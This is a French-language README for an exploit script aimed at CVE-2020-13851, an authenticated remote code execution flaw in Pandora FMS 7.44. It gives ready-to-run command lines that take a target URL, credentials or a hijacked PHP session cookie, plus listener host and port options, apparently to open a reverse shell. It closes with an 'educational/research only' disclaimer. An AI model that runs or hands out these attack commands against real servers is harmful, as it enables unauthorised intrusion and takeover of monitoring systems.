
CVE-2020-13851 Pandora FMS 7.44
Pandora FMS 7.44 CVE-2020-13851 RCE permet à un utilisateur authentifié d'exécuter des commandes à distance via la fonctionnalité des événements. Peut être effectué avec des identifiants ou un cookie de session PHP.
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -u username -p password -lhost 127.0.0.1 -lport 1337
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -c PHPSESSID -lhost 127.0.0.1 -lport 1337
Pour le menu d'aide
python3 pandorafms_7.44.py -h
Tout le code fourni dans ce dépôt est uniquement à des fins éducatives/de recherche. Toute action et/ou activité liée au contenu de ce dépôt relève de votre seule responsabilité. L'utilisation abusive du code de ce dépôt peut entraîner des poursuites pénales contre les personnes concernées. L'auteur ne sera pas tenu responsable en cas de poursuites pénales intentées contre des individus qui utiliseraient le code de ce dépôt de manière illégale.